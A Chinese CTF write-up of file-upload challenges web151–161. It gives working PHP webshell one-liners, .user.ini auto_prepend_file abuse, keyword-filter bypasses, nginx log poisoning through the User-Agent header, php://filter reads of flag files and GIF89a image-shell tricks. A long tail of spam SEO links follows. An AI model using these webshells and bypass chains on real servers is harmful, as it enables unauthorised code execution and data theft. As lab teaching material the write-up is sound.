当前位置: 首页 > news >正文 建设路第3小学网站电话北京制作网站软件 news 2025/11/3 3:40:56 建设路第3小学网站电话,北京制作网站软件,网站建设宣传文案,南通网站关键字优化文章目录 文件上传思路web 151web 152web 153知识点解题 web 154web 155web 156web 157web 158web 159web160web 161 文件上传思路 web 151 打开页面显示#xff1a;前台校验不可靠。说明这题是前端验证。 右键查看源代码#xff0c;找到与上传点有关的前端代码#xff1a… 文章目录 文件上传思路web 151web 152web 153知识点解题 web 154web 155web 156web 157web 158web 159web160web 161 文件上传思路 web 151 打开页面显示前台校验不可靠。说明这题是前端验证。 右键查看源代码找到与上传点有关的前端代码 这里使用了一个叫Layui的组件库url代表上传接口accept代表允许上传的文件类型exts代表允许上传的文件后缀。可见这里前端只允许上传图片类型的文件且文件后缀名为png。 绕过前端验证的最简单方法就是上传一个png的webshell再使用burp抓包更改文件后缀名再访问上传的webshell。 可见上传成功~下一步就是写一个shell?php eval($_POST[cmd]);?用webshell连接工具蚁剑去连接上传的webshell。 这里我们详细分析一句话木马不借助工具获取flag。 php代码要写在?php ?中php解析器才会认出这是php代码符号的意思是不报错即使执行错误也不报错eval()把字符串当做PHP代码执行$_POST[cmd]接收POST传参传参的变量名叫cmd。 除了POST传参还有GET传参$_GET[cmd]、全局的传参方法$_REQUEST[cmd]不管是GET传参 or POST传参 or FIlE传参 or COOKIE传参。 php执行系统命令的函数有system()、exec()、shell_exec()、反撇号。php执行外部命令 web 152 跟前一题一样的 web 153 知识点 自PHP 5.3.0起PHP支持基于每个目录的INI文件配置此类文件仅被CGI/Fast SAPI处理。如果PHP以模块化的方式运行在Apache里则.htaccess文件有同样效果。除了主php.ini之外php还会在每个目录下扫描INI文件从被执行的PHP文件所在目录开始一直上升到web根目录$_SERVER[‘DOCUMENT_ROOT’]所指定。如果被执行的php文件在web根目录之外则只扫描该目录。 配置选项是有权限的。php.ini是主要的配置文件.user.ini是用户自定义的配置文件且能覆盖php.ini的内容php解析器在解析php文件时会扫描.user.ini的配置。 在.user.ini风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。用人话说就是除了PHP_INI_SYSTEM模式的配置以外都可以在.user.ini中进行重写。两个重要的配置选项 auto_append_filefilename //相当于在每个php文件尾加上 include(“filename”) auto_prepend_filefilename //相当于文件头加上 include(“filename”)利用.user,ini的方法保证三个文件(.user.ini、shell.png、xx.php)在同一目录下再执行该目录下的php文件。例如 //.user.iniauto_prepend_file1.png//1.png?php phpinfo();?//1.php(任意php文件)三个文件在一个目录下就相当于1.php文件开头插入了include(1.png);进行文件包含因为1.png中有php代码所以经过include之后会执行shell脚本。 解题 此题前后端都检测content-type值只允许上传PNG文件。 上传.user.ini文件内容为auto_prepend_fileshell.png 上传shell.png文件 从之前可以得知upload文件夹下有一个index.php的文件故访问../upload/index.php?cmdphpinfo();可以看到phpinfo的页面。 web 154 知识点过滤?php 绕过方法使用短标签进行绕过没有限制条件。如 ?php eval($_GET[cmd]);? eval($_GET[cmd]);此题过滤了php这一关键词。使用短标签进行绕过。 pyload: ?eval($_GET[cmd]);?web 155 同web 154 web 156 知识点过滤php、[]关键字 绕过方法 php关键字被过滤使用php短标签进行绕过[]被过滤使用{}进行替换。例如?php eval($_GET[cmd]);? ?php eval($_GET{cmd});?payload ?system(cat ../fl*)?web 157 在前面的基础上过滤了{、;而且文件内容不能有php字符串。 绕过方法 过滤;则在短标签里可以省略;。例如 ?php eval($_GET{cmd});? ?php eval($_GET{cmd})?过滤{那就不用eval函数接受参数再执行系统命令直接用system()函数执行系统命令。如?system(ls)? -cat ../flag.phpcat ../fl* payload ?system(cat ../fl*)?web 158 同web157 web 159 在前面的基础上过滤了(。绕过方法直接用反撇号执行系统命令反撇号就相当于shell_exec()函数。payload ?cat ../fl*?web160 在前面的基础上过滤了反撇号。绕过方法 第一种方法利用日志包含绕过。就是说有些中间件会将用户访问记录记在日志里如果将webshell写到日志里再包含日志不就可以getshell了吗操作 同样先上传.user.ini文件内容为auto_prepend_fileshell.png 上传shell.png文件文件内容为?include/var/lo.g/nginx/access.lo.g?log关键词被过滤且将shell写在UA头中。 ngnix的日志路径为/var/log/nginx/access.logphp中可以用.进行字符串的拼接 访问xxx/upload/index.php. 第二种方法因为已经知道flag的位置通过php伪协议进行文件读取。 同样先上传.user.ini文件内容为auto_prepend_fileshell.png上传shell.png文件内容为?includeph.p://filter/covert.base64-encode/resource../flag.ph.p?访问xxx/upload/index.php再使用base64进行解码即可。 web 161 这关在前面的基础上还进行文件内容检测主要是使用getimagesize()函数进行检测服务端主要检测文件幻数。其实就是检测文件内容开始的地方不同后缀名的文件文件起始的地方是不一样的。 这关很恶心嗷前端验证只能为png文件后端检测文件内容必须是gif。 绕过方法制作图片马更简单的就是用burp抓包将你的shell写在文件内容里。 先上传.user.ini文件内容为auto_prepend_fileshell.png需要加gif文件的文件幻数GIF89a 上传shell.png文件内容为?includeph.p://filter/covert.base64-encode/resource../flag.ph.p?同样要加文件幻数GIF89a。 访问../upload/index.php使用base64进行解码。 文章转载自: http://www.morning.hzqjgas.com.gov.cn.hzqjgas.com http://www.morning.wzyfk.cn.gov.cn.wzyfk.cn http://www.morning.bbyqz.cn.gov.cn.bbyqz.cn http://www.morning.ns3nt8.cn.gov.cn.ns3nt8.cn http://www.morning.cjwkf.cn.gov.cn.cjwkf.cn http://www.morning.gccrn.cn.gov.cn.gccrn.cn http://www.morning.tfkqc.cn.gov.cn.tfkqc.cn http://www.morning.gqhgl.cn.gov.cn.gqhgl.cn http://www.morning.wknbc.cn.gov.cn.wknbc.cn http://www.morning.gqksd.cn.gov.cn.gqksd.cn http://www.morning.xqgfy.cn.gov.cn.xqgfy.cn http://www.morning.ghgck.cn.gov.cn.ghgck.cn http://www.morning.rmfh.cn.gov.cn.rmfh.cn http://www.morning.rgxn.cn.gov.cn.rgxn.cn http://www.morning.zrkp.cn.gov.cn.zrkp.cn http://www.morning.ppbqz.cn.gov.cn.ppbqz.cn http://www.morning.cwqpl.cn.gov.cn.cwqpl.cn http://www.morning.cxryx.cn.gov.cn.cxryx.cn http://www.morning.tlpsd.cn.gov.cn.tlpsd.cn http://www.morning.nwjd.cn.gov.cn.nwjd.cn http://www.morning.wptdg.cn.gov.cn.wptdg.cn http://www.morning.qwpyf.cn.gov.cn.qwpyf.cn http://www.morning.lsgjf.cn.gov.cn.lsgjf.cn http://www.morning.gswfs.cn.gov.cn.gswfs.cn http://www.morning.kpbgp.cn.gov.cn.kpbgp.cn http://www.morning.hffjj.cn.gov.cn.hffjj.cn http://www.morning.qkqpy.cn.gov.cn.qkqpy.cn http://www.morning.cpctr.cn.gov.cn.cpctr.cn http://www.morning.xhkgl.cn.gov.cn.xhkgl.cn http://www.morning.xblrq.cn.gov.cn.xblrq.cn http://www.morning.rdfq.cn.gov.cn.rdfq.cn http://www.morning.fwnyz.cn.gov.cn.fwnyz.cn http://www.morning.hdscx.cn.gov.cn.hdscx.cn http://www.morning.sbkb.cn.gov.cn.sbkb.cn http://www.morning.ygztf.cn.gov.cn.ygztf.cn http://www.morning.yfpnl.cn.gov.cn.yfpnl.cn http://www.morning.csnmd.cn.gov.cn.csnmd.cn http://www.morning.rshijie.com.gov.cn.rshijie.com http://www.morning.dhmll.cn.gov.cn.dhmll.cn http://www.morning.mcjyair.com.gov.cn.mcjyair.com http://www.morning.mwjwy.cn.gov.cn.mwjwy.cn http://www.morning.owenzhi.com.gov.cn.owenzhi.com http://www.morning.qbgdy.cn.gov.cn.qbgdy.cn http://www.morning.qxrct.cn.gov.cn.qxrct.cn http://www.morning.tndxg.cn.gov.cn.tndxg.cn http://www.morning.bdzps.cn.gov.cn.bdzps.cn http://www.morning.rbrhj.cn.gov.cn.rbrhj.cn http://www.morning.prznc.cn.gov.cn.prznc.cn http://www.morning.fbylq.cn.gov.cn.fbylq.cn http://www.morning.lnbcg.cn.gov.cn.lnbcg.cn http://www.morning.lmfxq.cn.gov.cn.lmfxq.cn http://www.morning.rybr.cn.gov.cn.rybr.cn http://www.morning.wtnwf.cn.gov.cn.wtnwf.cn http://www.morning.wdpbq.cn.gov.cn.wdpbq.cn http://www.morning.rwlnk.cn.gov.cn.rwlnk.cn http://www.morning.qtzk.cn.gov.cn.qtzk.cn http://www.morning.mrfgy.cn.gov.cn.mrfgy.cn http://www.morning.qqhfc.cn.gov.cn.qqhfc.cn http://www.morning.tddrh.cn.gov.cn.tddrh.cn http://www.morning.lmhcy.cn.gov.cn.lmhcy.cn http://www.morning.gwqkk.cn.gov.cn.gwqkk.cn http://www.morning.rfpxq.cn.gov.cn.rfpxq.cn http://www.morning.nwqyq.cn.gov.cn.nwqyq.cn http://www.morning.zxybw.cn.gov.cn.zxybw.cn http://www.morning.pymff.cn.gov.cn.pymff.cn http://www.morning.dnqpq.cn.gov.cn.dnqpq.cn http://www.morning.lxlzm.cn.gov.cn.lxlzm.cn http://www.morning.rwlsr.cn.gov.cn.rwlsr.cn http://www.morning.bnzjx.cn.gov.cn.bnzjx.cn http://www.morning.nyqxy.cn.gov.cn.nyqxy.cn http://www.morning.xnqjs.cn.gov.cn.xnqjs.cn http://www.morning.gkgb.cn.gov.cn.gkgb.cn http://www.morning.tzlfc.cn.gov.cn.tzlfc.cn http://www.morning.zdkzj.cn.gov.cn.zdkzj.cn http://www.morning.skkln.cn.gov.cn.skkln.cn http://www.morning.mqdr.cn.gov.cn.mqdr.cn http://www.morning.fgkrh.cn.gov.cn.fgkrh.cn http://www.morning.rdkt.cn.gov.cn.rdkt.cn http://www.morning.nqlcj.cn.gov.cn.nqlcj.cn http://www.morning.ktmnq.cn.gov.cn.ktmnq.cn 查看全文 http://www.tj-hxxt.cn/news/272673.html 相关文章: 网站开发软件开发淘宝网站建设 推广 上海 广州网站优化关键词排名网站是干嘛用的 站长之家关键词查询注册的空间网站 瑜伽网站设计重庆正云环保建设网站 网站推广只能使用在线手段进行电商设计工资一般多少 聊天网站备案建设局网站自查自纠 郑州网站seo排名专门做配电箱的网站 网站开发是啥了多个域名 一个网站 设计网站都有哪些邢台网站关键词优化 自己的网站如何优化wordpress企业电商主题排行榜 自贡建网站网页设计商城网站建设 网站开发岗位名称设计官网公司 最便宜服装网站建设淘宝客导购网站模板 网站制作文案杭州目录搜索引擎网站 什么企业做网站比较方便呢想要网站推广页 律师网站建设建议100m网站注册 晋中市两学一做网站营销型网站建设案例分析 自己做网站需要什么技术东营住房和城乡建设信息网 西安将军山网站建设wordpress 房产 济南网站外包wordpress 过期时间 请简述网站建设的方法镭拓网站建设 大同营销型网站建设费用画册设计公司推荐 百度旗下的外贸建站公司网站平台做推广方案 用xp做网站是否先搭建iis使用vue做单页面网站 网站登录模板下载选择做华为网站的目的和意义 网站设计流程步骤马云谈2025的房价3500 广西大兴建设有限公司网站seo搜索优化软件 广州网站优化排名做电脑网站用什么软件 idea做网站北京市住房与城乡建设部网站 龙口网站建设公司报价太原建设网站
